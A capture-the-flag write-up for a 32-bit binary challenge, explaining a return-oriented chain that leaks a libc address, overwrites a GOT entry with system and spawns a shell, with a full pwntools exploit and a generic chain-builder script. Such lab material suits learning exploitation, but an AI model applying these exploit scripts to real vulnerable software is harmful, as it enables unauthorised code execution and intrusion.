Solved the same way as rop1 and rop2. The binary is 32-bit, so every call in the chain is a return-to-PLT: write@plt leaks read's resolved address out of the GOT, the distance between read and system in the challenge libc (system_offset) turns that leak into system's address, read@plt stores "/bin/sh" in .bss and then overwrites write's GOT entry with system, and a final write@plt call with .bss as its only argument lands in system("/bin/sh"). The pppr (pop;pop;pop;ret) and pr (pop;ret) gadgets clean the arguments off the stack between calls. Note that system_offset is only valid for the libc the challenge runs against; for any other libc it has to be recomputed from that libc's symbol table.

exploit code
```python
from pwn import *

p = process('./rop3-7f3312fe43c46d26')

# Addresses taken from the binary: PLT/GOT entries, .bss and the two pop gadgets
read_plt  = 0x8048360
read_got  = 0x804a000
write_plt = 0x80483a0
write_got = 0x804a010
bss       = 0x804a020
system_offset = 0x9ad60   # read - system in the challenge libc; must match the target libc
pppr = 0x804855d          # pop; pop; pop; ret  (cleans three arguments)
pr   = 0x8048344          # pop; ret            (cleans one argument)
binsh = b"/bin/sh"

payload  = b"A" * 140     # padding up to the saved return address
# 1) write(1, read_got, 4): leak read's resolved libc address from the GOT
payload += p32(write_plt) + p32(pppr) + p32(1) + p32(read_got) + p32(4)
# 2) read(0, bss, 8): store "/bin/sh\n" in .bss, a writable address we know
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(len(binsh) + 1)
# 3) read(0, write_got, 4): overwrite write's GOT entry with system's address
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(4)
# 4) write(bss): write@plt now jumps through the patched GOT, i.e. system("/bin/sh")
payload += p32(write_plt) + p32(pr) + p32(bss)

log.info("Exploit..")
p.sendline(payload)

# The last 4 bytes of the output are the leaked GOT entry of read
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))

p.sendline(binsh)           # 8 bytes ("/bin/sh\n") for read(0, bss, 8)
p.send(p32(system_addr))    # exactly 4 bytes for read(0, write_got, 4); no stray newline
p.interactive()
```
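The payload above is one instance of a general pattern: each entry is a function address, a pop;ret-style gadget sized to the number of arguments, then the arguments. The following added example (mine, not part of the original writeup) builds such chains from a list of (function, args) calls and reproduces the rop3 payload byte for byte. It reuses the page's addresses; the gadget table, the JUNK filler word and the rule that a larger gadget may be used with filler words for its surplus pops are my assumptions. It uses only the standard library, so it runs without pwntools or the binary.

```python
import struct

# Addresses from the rop3 writeup on this page
READ_PLT, READ_GOT = 0x8048360, 0x804a000
WRITE_PLT, WRITE_GOT = 0x80483a0, 0x804a010
BSS = 0x804a020
PADDING = 140

# Assumed gadget table: number of pops -> gadget address (pr and pppr from the page)
GADGETS = {1: 0x8048344, 3: 0x804855d}
JUNK = 0x41414141  # assumed filler consumed by surplus pops


def p32(value):
    """Little-endian 32-bit pack, like pwntools' p32 for an i386 target."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def pick_gadget(gadgets, nargs):
    """Smallest pop*n;ret gadget with n >= nargs; its extra pops eat JUNK words."""
    candidates = [n for n in gadgets if n >= nargs]
    if not candidates:
        raise ValueError("no gadget pops at least %d words" % nargs)
    return min(candidates)


def build_chain(calls, gadgets=GADGETS, padding=PADDING):
    """Return padding + ROP chain for a list of (function_address, [args]).

    Stack layout per call on i386: func | pop*n;ret | arg1..argk | junk*(n-k)
    The gadget runs when func returns, pops the arguments (and filler) off
    the stack and returns into the next function address in the chain.
    A zero-argument call needs no gadget: func returns straight to the next entry.
    """
    chain = b"A" * padding
    for func, args in calls:
        chain += p32(func)
        if not args:
            continue
        n = pick_gadget(gadgets, len(args))
        chain += p32(gadgets[n])
        chain += b"".join(p32(a) for a in args)
        chain += p32(JUNK) * (n - len(args))
    return chain


def rop3_calls(binsh=b"/bin/sh"):
    """The four calls of the rop3 chain, in order."""
    return [
        (WRITE_PLT, [1, READ_GOT, 4]),          # leak read's libc address
        (READ_PLT, [0, BSS, len(binsh) + 1]),   # read "/bin/sh\n" into .bss
        (READ_PLT, [0, WRITE_GOT, 4]),          # overwrite write@got with system
        (WRITE_PLT, [BSS]),                     # write@plt now calls system("/bin/sh")
    ]


def rop3_chain():
    return build_chain(rop3_calls())


if __name__ == "__main__":
    payload = rop3_chain()
    print(len(payload), payload[PADDING:].hex())
```

Because pick_gadget rounds up to the next available gadget, a two-argument call such as read(0, bss) is emitted with pppr plus one filler word, which is what you would do by hand when the binary has no pop;pop;ret. A call that needs more pops than any gadget provides raises instead of silently producing a chain that would desynchronise at the next entry.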